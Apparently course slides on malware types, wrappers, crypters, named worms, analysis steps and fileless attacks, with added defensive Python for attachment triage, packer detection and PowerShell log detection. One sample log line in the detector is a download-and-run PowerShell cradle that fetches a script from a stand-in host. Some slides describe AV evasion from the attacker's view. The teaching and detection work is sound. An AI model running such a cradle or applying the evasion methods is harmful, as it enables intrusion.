Trojans and Other Attacks (source: rowdysites.msudenver.edu/~fustos/cis4500/pdf/chapter09.pdf)



Page 1

Trojans and Other Attacks

Chapter #9:

CIS 4500

Outline

- Describe malware types and their purpose
- Identify malware deployment methods
- Describe the malware analysis process
- Identify malware countermeasures
- Describe DoS attacks and techniques
- Identify DoS detection and countermeasure action
- Describe session hijacking and sequence prediction

CIS 4500

The “Malware” Attacks

- Malware is generally defined as software designed to harm or secretly access a computer system without the owner’s informed consent
- The CIS profession thinks of it as hostile, intrusive, annoying, and definitely something to be avoided
- Most malware is simply downloaded from the Internet with or without the user’s knowledge

CIS 4500

The “Malware” Attacks

- Software is considered to be malware based on the perceived intent of the creator rather than any particular features
- Most people think of viruses, worms, and Trojans as a means to spread destruction and as a huge inconvenience to computing life – to an ethical hacker the Trojan might actually look like a good means to pull off a successful exploit or to retain access to a machine—it’s simply one of many tools in the arsenal.

Page 2

CIS 4500

Malware

- There are a ton of “legitimate” applications, add-ons, toolbars, and the like that aren’t intended to be malware, but they may as well be
- Is “stealing” data for advertising purposes malware in nature?
- Or how about AV programs flagging applications as virus and/or malware?

CIS 4500

How to Get Malware

- Legitimate sites get compromised, leading to infections on visiting systems
- Drive-by downloading infects the system, usually via some weird Java vulnerability delivered through an ad stream
- Peer-to-peer applications or web application “features” are often hijacked to distribute malware
- An IRC channel is always a great way to distribute malware

CIS 4500

How to Get Malware

- The absolute easiest way you can get a target to install your malware is to just ask them to do it for you
- Send malware (usually a Trojan) via e-mail, file sharing, or a browser and, more often than not, they’ll open it and happily install whatever you want

CIS 4500

How to Pretend to Be Legitimate

- Wrappers
- Crypters and packers

Page 3

CIS 4500

Wrappers

- Wrappers are programs that allow you to bind an executable of your choice (Trojan) to an innocent file your target won’t mind opening
- Your target opens the application
- Meanwhile, your backdoor is installing and sits there waiting for your use later
- They have their own signatures and can definitely show up on AV scans

CIS 4500

Crypters

- Crypters are software tools that use a combination of encryption and code manipulation to render malware undetectable to AV and other security monitoring products (in Internet lingo, it’s referred to as FUD, for “fully undetectable”).

CIS 4500

Packers

- Packers use compression to pack the malware executable into a smaller size
- Besides reducing the file size, this also serves to make the malware harder to detect for some antivirus engines
- Both crypters and packers work much like a ZIP file, except that the extraction occurs in memory and not on the disk

CIS 4500

Trojans

- A Trojan is software that appears to perform a desirable function for the user prior to running or installing it but instead performs a function, usually without the user’s knowledge, that steals information or otherwise harms the system (or data)
- The word Trojan really means a method to gain, and maintain, access on a target machine

Page 4

CIS 4500

Trojan Ports

CIS 4500

Viruses

- A virus is a self-replicating program that reproduces its code by attaching copies into other executable codes
  - viruses create copies of themselves in other programs
  - activate on some sort of trigger event (such as a specific user task, a particular time, or an event of some sort)
- They usually get installed on a system via file attachments, user clicks on embedded e-mails, or the installation of pirated software

CIS 4500

Viruses

- Ransomware
  - this malware locks you out of your own system resources and demands an online payment of some sort in order to release them back to you
  - usually the payment is smaller than the cost it would take to remove the malware and recover anything lost. Ransomware is ubiquitous and unfortunately you’ll probably see it somewhere, sometime in your travels
  - examples: Cryptorbit, CryptoLocker, CryptoDefense, and police-themed

CIS 4500

Viruses

- Boot sector virus
  - also known as a system virus
  - moves the boot sector to another location on the hard drive, forcing the virus code to be executed first
  - these viruses are almost impossible to get rid of once you get infected
  - you can re-create the boot record — but easy

Page 5

CIS 4500

Viruses

- Shell virus
  - working just like the boot sector virus, this virus type wraps itself around an application’s code, inserting its own code before the application’s
  - every time the application is run, the virus code is run first
- Cluster virus
  - this virus type modifies directory table entries so that user or system processes are pointed to the virus code itself
  - a single copy of the virus “infects” everything

CIS 4500

Viruses

- Multipartite virus
  - this generally refers to a virus with multiple infection vectors
  - attempts to infect both files and the boot sector at the same time
  - multipartite can be combined with other attributes: polymorphic, retroviral, boot sector, and generally a pretty wild bit of code

CIS 4500

Viruses

- Macro virus
  - probably one of the most common malware types you’ll see in today’s world
  - this is usually written with Visual Basic for Applications (VBA)
  - this virus type infects template files created by Microsoft Office, normally Word and Excel

CIS 4500

Viruses

- Polymorphic code virus
  - this virus mutates its code using a built-in polymorphic engine
  - this type of virus is difficult to find and remove because its signature constantly changes
  - no part of the virus stays the same from infection to infection
- Encryption virus
  - this type of virus uses encryption to hide the code from antivirus scanners

Page 6

CIS 4500

Viruses

- Metamorphic virus
  - rewrites itself every time it infects a new file
- Stealth virus
  - also known as a “tunneling virus”
  - attempts to evade antivirus (AV) applications by intercepting the AV’s requests to the operating system (OS) and returning them to itself instead of the OS
  - the virus then alters the requests and sends them back to AV as uninfected, making the virus now appear “clean”

CIS 4500

Viruses

- Cavity virus
  - cavity viruses overwrite portions of host files so as not to increase the actual size of the file
  - this is done using the null content sections of the file and leaves the file’s actual functionality intact
- Sparse infector virus
  - they only infect occasionally – e.g. maybe the virus only fires every tenth time a specific application is run

CIS 4500

Viruses

- File extension virus
  - they change the file extensions of files to take advantage of most people having file extension view turned off
  - e.g. readme.txt.vbs might appear as readme.txt with extensions turned off
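The readme.txt.vbs trick above is something a mail gateway or endpoint agent can check for mechanically. The Python below is an added example, not code from the slides: it reconstructs how a name would be displayed with known extensions hidden and flags names whose real (last) extension is executable, distinguishing a bare executable attachment from one hidden behind a document-like decoy extension. The extension sets and the sample names are assumptions constructed for illustration.

```python
# Added example: triage attachment names for the hidden-extension trick.
# The extension sets below are illustrative choices, not an authoritative list.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe",
                   "js", "jse", "wsf", "wsh", "hta", "ps1"}
DECOY_EXTS = {"txt", "pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx",
              "jpg", "jpeg", "png", "gif", "htm", "html"}


def shown_name(filename: str) -> str:
    """Name as Explorer renders it with 'hide extensions for known file types' on:
    the final '.ext' is dropped, so 'readme.txt.vbs' is shown as 'readme.txt'."""
    stem, dot, _ext = filename.rpartition(".")
    return stem if dot and stem else filename


def classify_attachment(filename: str) -> dict:
    """Return a triage record for one attachment name."""
    parts = filename.lower().split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    record = {
        "name": filename,
        "shown_as": shown_name(filename),
        "real_ext": real_ext,
        "suspicious": False,
        "reason": "ok",
    }
    if real_ext in EXECUTABLE_EXTS:
        record["suspicious"] = True
        # A document-like extension directly before the executable one is the
        # disguise the slide describes; flag it separately from a plain .exe.
        if len(parts) > 2 and parts[-2] in DECOY_EXTS:
            record["reason"] = "executable hidden behind decoy extension"
        else:
            record["reason"] = "executable attachment"
    return record


def triage(names) -> list:
    """Keep only the records worth a human look."""
    return [r for r in map(classify_attachment, names) if r["suspicious"]]


# Constructed sample attachment names (not taken from the slides or any incident).
SAMPLE_NAMES = ["readme.txt.vbs", "invoice.pdf.exe", "report.pdf",
                "photo.jpg", "setup.exe", "notes"]

if __name__ == "__main__":
    for r in triage(SAMPLE_NAMES):
        print(f"{r['name']!r} is shown as {r['shown_as']!r}: {r['reason']}")
```

The check is deliberately done on the real last extension rather than on what the user sees, because the display name is exactly the part the attacker controls.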

CIS 4500

Virus Makers

- Sonic Bat
- PoisonVirus Maker
- Sam’s Virus Generator
- JPS Virus Maker

Page 7

CIS 4500

Worms

- A worm is a self-replicating malware computer program that uses a computer network to send copies of itself to other systems without human intervention
- Usually it doesn’t alter files, but it resides in active memory and duplicates itself, eating up resources and wreaking havoc along the way
- The most common use for a worm in the hacking world is the creation of botnets

CIS 4500

Worms

- Code Red
  - named after the soft drink the eEye Digital guys were drinking when they discovered it
  - exploited indexing software on IIS servers in 2001
  - used a buffer overflow and defaced servers
- Darlloz
  - a worm for “the Internet of Things”; it is a Linux-based worm that targets devices running ARM, MIPS, and PowerPC architectures, which are usually routers, set-top boxes, and security cameras

CIS 4500

Worms

- Slammer
  - also known as SQL Slammer
  - a denial-of-service worm attacking buffer overflow weaknesses in Microsoft SQL services. Also called Sapphire, SQL_HEL, and
  - it spread quickly using UDP
  - its small size (the entire worm could fit inside a single packet) allowed it to bypass many sensors

CIS 4500

Worms

- Nimda
  - the worm’s name comes from the word admin spelled backward
  - Nimda was a successful file infection virus that modified and touched nearly all web content on a machine
  - it spread so quickly it became the most widespread worm in history within about 22 minutes of its first sighting
  - Nimda spread through e-mail, open network shares, and websites, and it also took advantage of backdoors left on machines infected by the Code Red worm

Page 8

CIS 4500

Worms

- Bug Bear
  - propagating over open network shares and e-mail, Bug Bear terminated AV applications and set up a backdoor for later use
  - it also contained keylogging capabilities

CIS 4500

Worms

- Pretty Park
  - spread via e-mail (attempting a send every 30 minutes) and took advantage of IRC to propagate stolen passwords and the like
  - running the worm executable often displayed the 3D Pipe screensaver on Windows machines

CIS 4500

Malware Analysis

- The first step: have a good test bed
  - using a virtual machine with the NIC in host-only mode and no open shares is a good start
- Analyze the malware on that isolated VM while it’s in a static state
  - tools such as BinText and UPX can help in examining the binary itself as well as the compression and packaging technique
- Next, fire up the malware and check out the processes in use (with Process Monitor and Process Explorer, for example)
- Review network traffic using NetResident, TCPView, or maybe even Wireshark
- Lastly, check to see what files are added, changed, or deleted, what processes continue to spawn, and any changes to the registry
- Tools that can help you with malware analysis include, but are not limited to, IDA Pro (www.hex-rays.com), VirusTotal (www.virustotal.com), Anubis (anubis.iseclab.org), and Threat Analyzer (www.threattracksecurity.com)
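The static step above (examine the binary and its packaging before running anything) and the earlier Packers slide (compressed or encrypted content that only unpacks in memory) can both be illustrated with a small triage script. The Python below is an added example, not code from the slides or from any of the tools named: it pulls printable strings the way a strings utility or BinText does, measures Shannon entropy of the bytes, and looks for the section names (UPX0, UPX1) and header magic (UPX!) that UPX writes into a packed executable. The 7.0 bits-per-byte threshold is a heuristic assumption, and both sample blobs are constructed, not real binaries.

```python
import math
import random
import re
from collections import Counter

# Section names UPX writes into a packed PE (UPX0/UPX1) and its "UPX!" header magic.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")
# Heuristic threshold (assumption): compressed or encrypted data sits near
# 8 bits/byte, while ordinary code and data usually stay well below it.
PACKED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform random."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII of at least min_len bytes, the classic strings/BinText view."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def static_triage(data: bytes) -> dict:
    """Summarise a binary blob without executing it."""
    entropy = shannon_entropy(data)
    strings = extract_strings(data)
    upx = any(marker in data for marker in UPX_MARKERS)
    packed = upx or entropy > PACKED_ENTROPY_THRESHOLD
    return {
        "size": len(data),
        "entropy": round(entropy, 2),
        "string_count": len(strings),
        "strings": strings[:10],
        "upx_marker": upx,
        "verdict": "likely packed or encrypted" if packed else "probably unpacked",
    }


# Constructed samples (not real malware): a plain PE-like blob with readable
# import names, and a blob carrying a UPX section name followed by pseudo-random bytes.
PLAIN_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 200
    + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 100
    + b"kernel32.dll\x00CreateFileA\x00GetProcAddress\x00" + b"\x00" * 500
)
_rng = random.Random(1234)  # fixed seed so the sample is reproducible
PACKED_SAMPLE = b"MZ\x90\x00" + b"UPX0" + bytes(_rng.getrandbits(8) for _ in range(4096))

if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        report = static_triage(blob)
        print(name, report["verdict"], report["entropy"], report["strings"])
```

The point of the two signals together: a packed or crypted sample gives almost no useful strings and very high entropy, which is itself the finding, and tells you to unpack (UPX can often do it for its own format) or move on to the dynamic steps on the isolated VM.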

CIS 4500

Non-Malware (or Fileless) Attack

- A user visits a website using a browser, perhaps driven there from a cleverly disguised spam message
- On this page, Flash is loaded — Flash is a common attack vector due to its seemingly never-ending set of vulnerabilities
- Flash invokes PowerShell, an OS tool that exists on every Windows machine, and feeds it instructions through the command line — all operating in memory
- PowerShell connects to a stealth command and control server, where it downloads a malicious PowerShell script that finds sensitive data and sends it to the attacker
- This attack never downloads any malware
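Because nothing touches disk in the chain above, file scanning cannot see it; what remains visible is the process tree (a browser or plug-in spawning PowerShell) and the command line PowerShell was handed. The Python below is an added detection example, not from the slides: it scores process-creation records, weighting a browser parent heavily and adding a point for each command-line trait typical of in-memory download-and-run usage. The pipe-delimited log format, the parent and indicator lists, and every log line are constructed for this example.

```python
import re

# Parents from which a PowerShell child should essentially never appear (assumed list).
BROWSER_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits of in-memory "fetch and run" usage; each pattern counts once.
CMDLINE_INDICATORS = [
    (re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), "download cradle"),
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution (IEX)"),
]


def parse_event(line: str) -> dict:
    """One process-creation record: timestamp|parent image|image path|command line."""
    ts, parent, image, cmdline = line.split("|", 3)
    return {
        "ts": ts,
        "parent": parent.strip().lower(),
        "image": image.rsplit("\\", 1)[-1].lower(),
        "cmdline": cmdline,
    }


def analyze_event(event: dict) -> dict:
    """Score one event: a browser parent weighs 2, each command-line trait weighs 1."""
    indicators = [label for pattern, label in CMDLINE_INDICATORS if pattern.search(event["cmdline"])]
    score = len(indicators)
    if event["parent"] in BROWSER_PARENTS:
        indicators.insert(0, "spawned by browser (" + event["parent"] + ")")
        score += 2
    alert = event["image"] in POWERSHELL_IMAGES and score >= 2
    return {**event, "indicators": indicators, "score": score, "alert": alert}


def detect(log_text: str) -> list:
    """Return the alerting events from a pipe-delimited process-creation log."""
    events = (analyze_event(parse_event(line)) for line in log_text.strip().splitlines())
    return [e for e in events if e["alert"]]


# Constructed sample log (format and entries invented for this example; the host
# in the last line is a reserved .invalid name and the base64 blob is a placeholder).
SAMPLE_LOG = r"""
2020-06-12T10:01:05|explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-Service
2020-06-12T10:02:17|iexplore.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -ep bypass -enc <BASE64-PLACEHOLDER>
2020-06-12T10:03:44|winword.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\notes.txt
2020-06-12T10:05:02|explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')
"""

if __name__ == "__main__":
    for e in detect(SAMPLE_LOG):
        print(e["ts"], e["parent"], "->", e["image"], "|", ", ".join(e["indicators"]))
```

The first record (an administrator running Get-Service from Explorer) scores zero and is left alone; the browser-spawned, hidden, encoded invocation and the Explorer-spawned download cradle both alert. In production the same logic would read Sysmon or EDR process-creation events, and script block logging would supply what the encoded command actually decoded to.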

Page 9

CIS 4500

Tools for Your Lab

- VirtualBox (.org) – can also convert between formats (.vmdk, .vdi, .vhd)
- DOSBox (.com)
- VMware Player (vmware.com)
- Free Windows VM (MS Developer)
- Metasploitable (Rapid7.com)
- Kali (.org)

Stay Alert!

There is no 100 percent secure system, and there is nothing that is foolproof!